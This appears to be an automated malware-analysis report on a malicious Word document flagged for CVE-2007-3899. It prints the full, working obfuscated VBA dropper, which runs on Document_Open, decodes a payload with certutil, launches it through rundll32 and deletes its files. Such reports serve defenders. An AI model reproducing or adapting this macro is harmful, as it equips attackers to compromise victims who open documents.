Verdict: MALICIOUS
Risk Score: 258
Malware Insights
MITRE ATT&CK
- T1203 Exploitation for Client Execution
- T1059.005 Visual Basic
The sample is a malicious Microsoft Word document that exploits the CVE-2007-3899 vulnerability, a known memory corruption flaw. The presence of a Document_Open macro and references to the CreateProcess API indicate that the macro is designed to execute arbitrary code. The heap spray and NOP sled heuristics further support the exploitation of a memory corruption vulnerability.
Heuristics (9)
- CVE-2007-3899 — Microsoft Word malformed string memory corruption (critical, CVE likely, CVE_2007_3899): Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
- ClamAV: Doc.Malware.Sagent-9761959-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Sagent-9761959-0
- Heap-spray pattern detected (high, SC_HEAP_SPRAY): Repeated 0x41 (A) bytes found
  Disassembly: attempted x86 opcode disassembly of the matched region.
- Reference to CreateProcess API (high, SC_STR_CREATEPROCESS): Reference to CreateProcess API
- NOP-equivalent sled detected (medium, SC_NOP_EQUIV_SLED): Long run of 0x41 bytes
  Disassembly: attempted x86 opcode disassembly of the matched region.
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro
  Matched lines in script:
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    Module1.NkmoA
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access)
  Matched lines in script:
    Private Function DGrIwBoic(S As String) As String
    DGrIwBoic = Environ$(S) & Application.PathSeparator & "N5uIJVSp"
    End Function
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5115 bytes |

SHA-256: 50b14759c8935fb40cd334d3c762f0d46f0fd21a9276b64b32d418271015e09d

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Module1.NkmoA
End Sub
Attribute VB_Name = "Module1"
Private Type WsRs0y
t6nZZZL4 As Long: bzWF8cAxW As Long: OUCyrzh As Long: h9kn6tE7T As Long
End Type
Private Type x0mlD777fR
nuprnuX As Long: QxfURjck As String: uo6VH7 As String: xMAbY0 As String: Ad6oi As Long
OACsb As Long: sOSQF As Long: aNQ7jC1qd As Long: TOqbEKy6kn As Long: GBI7VPTB As Long
nmG2Jca As Long: B0SQwB4yl As Long: UWx47whVF As Integer: cyMwJzuK As Integer: jDOnI As Integer
oUxwN9B As Long: gyteOufC As Long: JoYDY As Long
End Type
#If VBA7 Then
Private Declare PtrSafe Function SetCapture Lib "user32" (ByVal VwQeXW3x As LongPtr) As LongPtr
Private Declare PtrSafe Function SetCaretBlinkTime Lib "user32" (ByVal QT4gIx As LongPtr) As LongPtr
Private Declare PtrSafe Function SetCaretPos Lib "user32" (ByVal kTThi6ogY As LongPtr, _
ByVal udaeOA As LongPtr) As LongPtr
Private Declare PtrSafe Function CreateProcessA Lib "Kernel32" (ByVal XejW0V3vY As String, _
ByVal J4RhSY As String, ByVal dBtMHO As Long, ByVal IQkvEp4iw1 As Long, _
ByVal Yy7ZRG4U As LongPtr, ByVal uN5WJK09 As LongPtr, ByVal PIIiG As Long, _
ByVal cHOMWJAb As String, o6A6mI0 As x0mlD777fR, STAeUYh2uv As WsRs0y) As LongPtr
Private Declare PtrSafe Function Sleep Lib "Kernel32" (ByVal AJcqtEHAiq As Long) As Long
Private Declare PtrSafe Function SetClassLongA Lib "user32" (ByVal m5JPchgFK As LongPtr, _
ByVal pAWbR As LongPtr, ByVal vYUEecyn As LongPtr) As LongPtr
Private Declare PtrSafe Function SetClassWord Lib "user32" (ByVal CbHOJb As LongPtr, _
ByVal jo1Yvob9OE As LongPtr, ByVal impsx3 As LongPtr) As LongPtr
#Else
Private Declare Function CreateProcessA Lib "Kernel32" (ByVal TRI0AOk6v As String, ByVal Kmh36 As String, _
ByVal NOPGi3iTt1 As Long, ByVal vnqCO0kI As Long, ByVal Hc6nmpdkX As Long, _
ByVal A1vO8bhJDw As Long, ByVal xOaF2c As Long, ByVal Y9QTCYJM As String, _
LrEd4VXk7F As x0mlD777fR, W8VCJpXb As WsRs0y) As Long
Private Declare Function Sleep Lib "Kernel32" (ByVal EE1llLmFN As Long) As Long
Private Declare Function SetCapture Lib "user32" (ByVal uf9a5u8 As Long) As Long
Private Declare Function SetClassLongA Lib "user32" (ByVal c4mu2ZeH As Long, _
ByVal ZerXTd As Long, ByVal Q1XCy8NTq As Long) As Long
Private Declare Function SetClassWord Lib "user32" (ByVal MMbidpgyl As Long, _
ByVal jZ3XfB As Long, ByVal OpN3NNgzvv As Long) As Long
#End If
Private ZRyGV
Private AAAA
Private BBBB
Public Function NkmoA()
ZRyGV = DGrIwBoic(MQpR2UGXn9("HOLIRUSUHVX"))
j0uQ3dhEF (ZRyGV)
HQKgx (ZRyGV)
End Function
Private Function j0uQ3dhEF(ZRyGV As String)
ActiveDocument.SaveAs2 FileName:=ZRyGV + ".xls", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=ZRyGV + ".doc", FileFormat:=wdFormatText
End Function
Private Function HQKgx(ZRyGV As String)
ZRyGV = DGrIwBoic(MQpR2UGXn9("HOLIRUSUHVX"))
ABC (ZRyGV)
End Function
Private Function ABC(ZRyGV As String)
WJuUtxJ = " " & MQpR2UGXn9("hgrfhg0") & " " + ZRyGV + ".xls " + ZRyGV + MQpR2UGXn9("oog1")
Sb9etGDP0T = MQpR2UGXn9("h{h1olwxwuhf_56phwv|V_vzrgqlZ_=F")
Dim Fne9Hx As x0mlD777fR: Dim ic0uG As WsRs0y
If CreateProcessA(Sb9etGDP0T, WJuUtxJ, 0, 0, False, &H8, 0, MQpR2UGXn9("_=F"), Fne9Hx, ic0uG) Then
Sleep 5000
BCD (ZRyGV)
Else
ActiveDocument.Close
End If
End Function
Private Function BCD(ZRyGV As String)
Dim Aki5thX As x0mlD777fR: Dim FffkQzJ As WsRs0y
uN8mpOOqFN = MQpR2UGXn9("h{h156oogqxu_56phwv|V_vzrgqlZ_=F")
If CreateProcessA(uN8mpOOqFN, " " & ZRyGV + MQpR2UGXn9("4U/oog1"), 0, 0, False, 0, 0, MQpR2UGXn9("_=F"), Aki5thX, FffkQzJ) Then
Kill ZRyGV + ".xls"
Sleep 4000
Kill ZRyGV + MQpR2UGXn9("oog1")
End If
End Function
Private Function DGrIwBoic(S As String) As String
DGrIwBoic = Environ$(S) & Application.PathSeparator & "N5uIJVSp"
End Function
Function MQpR2UGXn9(Aki5thX As String) As String
MQpR2UGXn9 = YOxYOcH0w(jU6vF3(Aki5thX, Len(Aki5thX), 1), Len(Aki5thX), 3)
End Function
Public Function jU6vF3(FffkQzJ As String, WJuUtxJ As Long, CiaxhQp As Long) As String
AAAA = FffkQzJ
For Sb9etGDP0T = 1 To WJuUtxJ
Mid$(AAAA, Sb9etGDP0T, 1) = Mid$(FffkQzJ, WJuUtxJ - Sb9etGDP0T + CiaxhQp, 1)
Next
jU6vF3 = AAAA
End Function
Public Function YOxYOcH0w(Fne9Hx As String, FffkQzJ As Long, WJuUtxJ As Long) As String
For Aki5thX = 1 To FffkQzJ
BBBB = Oozl5UCb6(Mid$(Fne9Hx, Aki5thX, 1))
Mid$(Fne9Hx, Aki5thX, 1) = BBBB
Next
YOxYOcH0w = Fne9Hx
End Function
Private Function A9Z4SY(Fne9Hx As Long) As String
A9Z4SY = Chr(Fne9Hx)
End Function
Private Function Oozl5UCb6(Fne9Hx As String) As String
Oozl5UCb6 = A9Z4SY(Asc(Fne9Hx) - 3)
End Function